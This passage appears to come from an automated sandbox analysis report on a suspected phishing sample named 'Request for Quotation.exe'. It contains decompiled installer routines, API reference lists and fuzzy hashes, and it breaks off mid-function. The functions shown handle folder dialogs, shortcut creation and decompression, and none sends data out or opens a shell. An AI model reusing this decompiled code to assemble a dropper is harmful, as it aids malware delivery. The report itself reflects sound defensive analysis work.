                                                                                							memset( &_v76, 0, _t152 << 2);
                                                                                							_v80 = _t166;
                                                                                							_v72 = 0x42a8b8;
                                                                                							_v60 = E00404AB4;
                                                                                							_v56 = _t146;
                                                                                							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
                                                                                							_t122 =  &_v80;
                                                                                							_v64 = 0x41;
                                                                                							__imp__SHBrowseForFolderA(_t122);
                                                                                							if(_t122 == 0) {
                                                                                								_a8 = 0x40f;
                                                                                							} else {
                                                                                								__imp__CoTaskMemFree(_t122);
                                                                                								E00405BE5(_t146);
                                                                                								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
                                                                                								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                                                									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
                                                                                									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
                                                                                										lstrcatA(_t146, 0x42e3e0);
                                                                                									}
                                                                                								}
                                                                                								 *0x42a8a8 =  *0x42a8a8 + 1;
                                                                                								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                							}
                                                                                						}
                                                                                						goto L20;
                                                                                					}
                                                                                					if(_a12 >> 0x10 != 0x300) {
                                                                                						goto L53;
                                                                                					}
                                                                                					_a8 = 0x40f;
                                                                                					goto L12;
                                                                                				} else {
                                                                                					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
                                                                                						E00405BE5(_t146);
                                                                                					}
                                                                                					 *0x42ec18 = _t166;
                                                                                					SetWindowTextA(_t165, _t146);
                                                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                					_push(1);
                                                                                					E004042D1(_t166);
                                                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                					_push(0x14);
                                                                                					E004042D1(_t166);
                                                                                					E00404306(_t165);
                                                                                					_t138 = E00406656(8);
                                                                                					if(_t138 == 0) {
                                                                                						L53:
                                                                                						return E00404338(_a8, _a12, _a16);
                                                                                					} else {
                                                                                						 *_t138(_t165, 1);
                                                                                						goto L8;
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x00404a30
                                                                                0x00404a38
                                                                                0x00404a53
                                                                                0x00404a3a
                                                                                0x00404a43
                                                                                0x00404a43
                                                                                0x00404a38
                                                                                0x00404a58
                                                                                0x00404a5d
                                                                                0x00404a62
                                                                                0x00404a6b
                                                                                0x00404a6b
                                                                                0x00404a74
                                                                                0x00404a76
                                                                                0x00404a76
                                                                                0x00404a82
                                                                                0x00404a8a
                                                                                0x00404a94
                                                                                0x00404a94
                                                                                0x00404a99
                                                                                0x00000000
                                                                                0x00404a99
                                                                                0x00404948
                                                                                0x004048ff
                                                                                0x00404906
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404906
                                                                                0x00404825
                                                                                0x0040482e
                                                                                0x00404848
                                                                                0x0040484d
                                                                                0x00404857
                                                                                0x0040485e
                                                                                0x0040486a
                                                                                0x0040486d
                                                                                0x00404870
                                                                                0x00404877
                                                                                0x0040487f
                                                                                0x00404882
                                                                                0x00404886
                                                                                0x0040488d
                                                                                0x00404895
                                                                                0x004048ef
                                                                                0x00404897
                                                                                0x00404898
                                                                                0x0040489f
                                                                                0x004048a9
                                                                                0x004048b1
                                                                                0x004048be
                                                                                0x004048d2
                                                                                0x004048d6
                                                                                0x004048d6
                                                                                0x004048d2
                                                                                0x004048db
                                                                                0x004048e8
                                                                                0x004048e8
                                                                                0x00404895
                                                                                0x00000000
                                                                                0x0040484d
                                                                                0x0040483b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404841
                                                                                0x00000000
                                                                                0x004047ac
                                                                                0x004047b9
                                                                                0x004047c2
                                                                                0x004047cf
                                                                                0x004047cf
                                                                                0x004047d6
                                                                                0x004047dc
                                                                                0x004047e5
                                                                                0x004047e8
                                                                                0x004047eb
                                                                                0x004047f3
                                                                                0x004047f6
                                                                                0x004047f9
                                                                                0x004047ff
                                                                                0x00404806
                                                                                0x0040480d
                                                                                0x00404a9f
                                                                                0x00404ab1
                                                                                0x00404813
                                                                                0x00404816
                                                                                0x00000000
                                                                                0x00404816
                                                                                0x0040480d

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 004047B2
                                                                                • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                                • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                                • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                                • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                                • SetDlgItemTextA.USER32 ref: 004048E8
                                                                                  • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                                  • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                  • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                  • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                  • Part of subcall function 00406528: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                                                  • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                  • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                                  • Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                • API String ID: 2624150263-3265145871
                                                                                • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                                • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E0040216B(void* __eflags) {
                                                                                				signed int _t55;
                                                                                				void* _t59;
                                                                                				intOrPtr* _t63;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr* _t65;
                                                                                				intOrPtr* _t67;
                                                                                				intOrPtr* _t69;
                                                                                				intOrPtr* _t71;
                                                                                				intOrPtr* _t73;
                                                                                				intOrPtr* _t75;
                                                                                				intOrPtr* _t78;
                                                                                				intOrPtr* _t80;
                                                                                				intOrPtr* _t82;
                                                                                				intOrPtr* _t84;
                                                                                				int _t87;
                                                                                				intOrPtr* _t95;
                                                                                				signed int _t105;
                                                                                				signed int _t109;
                                                                                				void* _t111;
                                                                                
                                                                                				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                                                				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                                                				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                                                				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                                                				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                                                				_t55 =  *(_t111 - 0x18);
                                                                                				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                                				_t105 = _t55 & 0x00008000;
                                                                                				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                				if(E00405C52( *(_t111 - 0xc)) == 0) {
                                                                                					E00402BCE(0x21);
                                                                                				}
                                                                                				_t59 = _t111 + 8;
                                                                                				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                                                				if(_t59 < _t87) {
                                                                                					L15:
                                                                                					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                					_push(0xfffffff0);
                                                                                				} else {
                                                                                					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                                                					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                					if(_t64 >= _t87) {
                                                                                						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                						if(_t105 == _t87) {
                                                                                							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                                						}
                                                                                						if(_t109 != _t87) {
                                                                                							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                						}
                                                                                						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                                						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                                						if( *_t95 != _t87) {
                                                                                							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                                						}
                                                                                						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                                						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                                						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                							}
                                                                                						}
                                                                                						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                					}
                                                                                					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                						_push(0xfffffff4);
                                                                                					} else {
                                                                                						goto L15;
                                                                                					}
                                                                                				}
                                                                                				E00401423();
                                                                                				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                • API String ID: 123533781-47812868
                                                                                • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                                • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 39%
                                                                                			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                                                				void* _t19;
                                                                                
                                                                                				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                                                					E004061AB(__edi, _t6);
                                                                                					_push(_t19 - 0x1a4);
                                                                                					_push(__esi);
                                                                                					E0040624D();
                                                                                				} else {
                                                                                					 *__edi = __ebx;
                                                                                					 *__esi = __ebx;
                                                                                					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                				}
                                                                                				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID:
                                                                                • API String ID: 1974802433-0
                                                                                • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                                • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00406A9B(signed int __ebx, signed int* __esi) {
                                                                                				signed int _t396;
                                                                                				signed int _t425;
                                                                                				signed int _t442;
                                                                                				signed int _t443;
                                                                                				signed int* _t446;
                                                                                				void* _t448;
                                                                                
                                                                                				L0:
                                                                                				while(1) {
                                                                                					L0:
                                                                                					_t446 = __esi;
                                                                                					_t425 = __ebx;
                                                                                					if( *(_t448 - 0x34) == 0) {
                                                                                						break;
                                                                                					}
                                                                                					L55:
                                                                                					__eax =  *(__ebp - 0x38);
                                                                                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                					__ecx = __ebx;
                                                                                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                					__ebx = __ebx + 8;
                                                                                					while(1) {
                                                                                						L56:
                                                                                						if(__ebx < 0xe) {
                                                                                							goto L0;
                                                                                						}
                                                                                						L57:
                                                                                						__eax =  *(__ebp - 0x40);
                                                                                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                						__ecx = __eax;
                                                                                						__esi[1] = __eax;
                                                                                						__ecx = __eax & 0x0000001f;
                                                                                						if(__cl > 0x1d) {
                                                                                							L9:
                                                                                							_t443 = _t442 | 0xffffffff;
                                                                                							 *_t446 = 0x11;
                                                                                							L10:
                                                                                							_t446[0x147] =  *(_t448 - 0x40);
                                                                                							_t446[0x146] = _t425;
                                                                                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                							L11:
                                                                                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                							E0040720A( *(_t448 + 8));
                                                                                							return _t443;
                                                                                						}
                                                                                						L58:
                                                                                						__eax = __eax & 0x000003e0;
                                                                                						if(__eax > 0x3a0) {
                                                                                							goto L9;
                                                                                						}
                                                                                						L59:
                                                                                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                						__ebx = __ebx - 0xe;
                                                                                						_t94 =  &(__esi[2]);
                                                                                						 *_t94 = __esi[2] & 0x00000000;
                                                                                						 *__esi = 0xc;
                                                                                						while(1) {
                                                                                							L60:
                                                                                							__esi[1] = __esi[1] >> 0xa;
                                                                                							__eax = (__esi[1] >> 0xa) + 4;
                                                                                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                								goto L68;
                                                                                							}
                                                                                							L61:
                                                                                							while(1) {
                                                                                								L64:
                                                                                								if(__ebx >= 3) {
                                                                                									break;
                                                                                								}
                                                                                								L62:
                                                                                								if( *(__ebp - 0x34) == 0) {
                                                                                									goto L182;
                                                                                								}
                                                                                								L63:
                                                                                								__eax =  *(__ebp - 0x38);
                                                                                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                								__ecx = __ebx;
                                                                                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                								__ebx = __ebx + 8;
                                                                                							}
                                                                                							L65:
                                                                                							__ecx = __esi[2];
                                                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                							__ebx = __ebx - 3;
                                                                                							_t108 = __ecx + 0x408408; // 0x121110
                                                                                							__ecx =  *_t108;
                                                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                							__ecx = __esi[1];
                                                                                							__esi[2] = __esi[2] + 1;
                                                                                							__eax = __esi[2];
                                                                                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                								goto L64;
                                                                                							}
                                                                                							L66:
                                                                                							while(1) {
                                                                                								L68:
                                                                                								if(__esi[2] >= 0x13) {
                                                                                									break;
                                                                                								}
                                                                                								L67:
                                                                                								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                                                								__eax =  *_t119;
                                                                                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                								_t126 =  &(__esi[2]);
                                                                                								 *_t126 = __esi[2] + 1;
                                                                                							}
                                                                                							L69:
                                                                                							__ecx = __ebp - 8;
                                                                                							__edi =  &(__esi[0x143]);
                                                                                							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                							__eax = 0;
                                                                                							 *(__ebp - 8) = 0;
                                                                                							__eax =  &(__esi[3]);
                                                                                							 *__edi = 7;
                                                                                							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                							if(__eax != 0) {
                                                                                								L72:
                                                                                								 *__esi = 0x11;
                                                                                								while(1) {
                                                                                									L180:
                                                                                									_t396 =  *_t446;
                                                                                									if(_t396 > 0xf) {
                                                                                										break;
                                                                                									}
                                                                                									L1:
                                                                                									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
                                                                                										case 0:
                                                                                											L101:
                                                                                											__eax = __esi[4] & 0x000000ff;
                                                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                                                											__eax = __esi[5];
                                                                                											__esi[2] = __esi[5];
                                                                                											 *__esi = 1;
                                                                                											goto L102;
                                                                                										case 1:
                                                                                											L102:
                                                                                											__eax = __esi[3];
                                                                                											while(1) {
                                                                                												L105:
                                                                                												__eflags = __ebx - __eax;
                                                                                												if(__ebx >= __eax) {
                                                                                													break;
                                                                                												}
                                                                                												L103:
                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                													goto L182;
                                                                                												}
                                                                                												L104:
                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                												__ecx = __ebx;
                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                												__ebx = __ebx + 8;
                                                                                												__eflags = __ebx;
                                                                                											}
                                                                                											L106:
                                                                                											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                											__eax = __eax &  *(__ebp - 0x40);
                                                                                											__ecx = __esi[2];
                                                                                											__eax = __esi[2] + __eax * 4;
                                                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                											__ecx =  *__eax & 0x000000ff;
                                                                                											__eflags = __ecx;
                                                                                											if(__ecx != 0) {
                                                                                												L108:
                                                                                												__eflags = __cl & 0x00000010;
                                                                                												if((__cl & 0x00000010) == 0) {
                                                                                													L110:
                                                                                													__eflags = __cl & 0x00000040;
                                                                                													if((__cl & 0x00000040) == 0) {
                                                                                														goto L125;
                                                                                													}
                                                                                													L111:
                                                                                													__eflags = __cl & 0x00000020;
                                                                                													if((__cl & 0x00000020) == 0) {
                                                                                														goto L9;
                                                                                													}
                                                                                													L112:
                                                                                													 *__esi = 7;
                                                                                													goto L180;
                                                                                												}
                                                                                												L109:
                                                                                												__esi[2] = __ecx;
                                                                                												__esi[1] = __eax;
                                                                                												 *__esi = 2;
                                                                                												goto L180;
                                                                                											}
                                                                                											L107:
                                                                                											__esi[2] = __eax;
                                                                                											 *__esi = 6;
                                                                                											goto L180;
                                                                                										case 2:
                                                                                											L113:
                                                                                											__eax = __esi[2];
                                                                                											while(1) {
                                                                                												L116:
                                                                                												__eflags = __ebx - __eax;
                                                                                												if(__ebx >= __eax) {
                                                                                													break;
                                                                                												}
                                                                                												L114:
                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                													goto L182;
                                                                                												}
                                                                                												L115:
                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                												__ecx = __ebx;
                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                												__ebx = __ebx + 8;
                                                                                												__eflags = __ebx;
                                                                                											}
                                                                                											L117:
                                                                                											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                											__ecx = __eax;
                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                											__ebx = __ebx - __eax;
                                                                                											__eflags = __ebx;
                                                                                											__eax = __esi[4] & 0x000000ff;
                                                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                                                											__eax = __esi[6];
                                                                                											__esi[2] = __esi[6];
                                                                                											 *__esi = 3;
                                                                                											goto L118;
                                                                                										case 3:
                                                                                											L118:
                                                                                											__eax = __esi[3];
                                                                                											while(1) {
                                                                                												L121:
                                                                                												__eflags = __ebx - __eax;
                                                                                												if(__ebx >= __eax) {
                                                                                													break;
                                                                                												}
                                                                                												L119:
                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                													goto L182;
                                                                                												}
                                                                                												L120:
                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                												__ecx = __ebx;
                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                												__ebx = __ebx + 8;
                                                                                												__eflags = __ebx;
                                                                                											}
                                                                                											L122:
                                                                                											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                											__eax = __eax &  *(__ebp - 0x40);
                                                                                											__ecx = __esi[2];
                                                                                											__eax = __esi[2] + __eax * 4;
                                                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                											__ecx =  *__eax & 0x000000ff;
                                                                                											__eflags = __cl & 0x00000010;
                                                                                											if((__cl & 0x00000010) == 0) {
                                                                                												L124:
                                                                                												__eflags = __cl & 0x00000040;
                                                                                												if((__cl & 0x00000040) != 0) {
                                                                                													goto L9;
                                                                                												}
                                                                                												L125:
                                                                                												__esi[3] = __ecx;
                                                                                												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                												__esi[2] = __eax;
                                                                                												goto L180;
                                                                                											}
                                                                                											L123:
                                                                                											__esi[2] = __ecx;
                                                                                											__esi[3] = __eax;
                                                                                											 *__esi = 4;
                                                                                											goto L180;
                                                                                										case 4:
                                                                                											L126:
                                                                                											__eax = __esi[2];
                                                                                											while(1) {
                                                                                												L129:
                                                                                												__eflags = __ebx - __eax;
                                                                                												if(__ebx >= __eax) {
                                                                                													break;
                                                                                												}
                                                                                												L127:
                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                													goto L182;
                                                                                												}
                                                                                												L128:
                                                                                												__ecx =  *(__ebp - 0x38);
                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                												__ecx = __ebx;
                                                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
